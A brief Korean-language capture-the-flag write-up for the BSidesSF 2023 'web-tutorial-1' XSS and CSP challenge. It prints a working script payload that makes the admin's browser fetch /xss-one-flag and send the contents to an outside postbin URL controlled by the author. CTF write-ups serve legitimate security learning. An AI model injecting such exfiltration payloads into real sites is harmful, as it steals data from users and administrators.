[BSidesSF 2023 CTF] web-tutorial-1

1. 개요

XSS, CSP 문제

 

2. 분석

admin의 권한으로 /xss-one-flag를 읽고, 그 결과를 제가 만든 서버에 전송하도록 만듭니다.

<script>

fetch("/xss-one-flag")
  .then(r => r.text())
  .then(t => fetch("https://www.toptal.com/developers/postbin/1682170081878-4064430973958?flag="+t))

</script>